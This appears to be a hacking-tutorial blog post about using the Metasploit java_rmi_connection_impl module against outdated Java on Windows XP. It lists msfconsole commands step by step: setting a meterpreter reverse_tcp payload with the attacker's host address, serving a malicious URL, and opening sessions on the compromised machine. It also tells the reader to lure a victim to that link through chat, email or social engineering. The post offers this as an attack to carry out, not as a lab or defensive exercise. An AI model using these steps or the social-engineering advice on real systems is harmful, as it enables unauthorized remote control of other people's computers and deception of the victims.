Hacking with Java RMIConnectionImpl Deserialization Privilege Escalation Exploit

This module exploits vulnerability in the Java Runtime Environment that allows to deserialize a Marshalled Object containing a custom class loader under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Java 6 Standard Edition prior to update 19

Java 5 Standard Edition prior to update 23

Java 6 Standard Edition Update 18

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_rmi_connection_impl

Msf exploit (java_rmi_connection_impl)>set payload java/meterpreter/reverse_tcp

Msf exploit (java_rmi_connection_impl)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (java_rmi_connection_impl)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (java_rmi_connection_impl)>set uripath bipasapic (The Url to use for this exploit)

Msf exploit (java_rmi_connection_impl)>exploit 

Now an URL you should give to your victim //192.168.1.4:8080/bipasapic

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Leave a Reply

Your email address will not be published. Required fields are marked *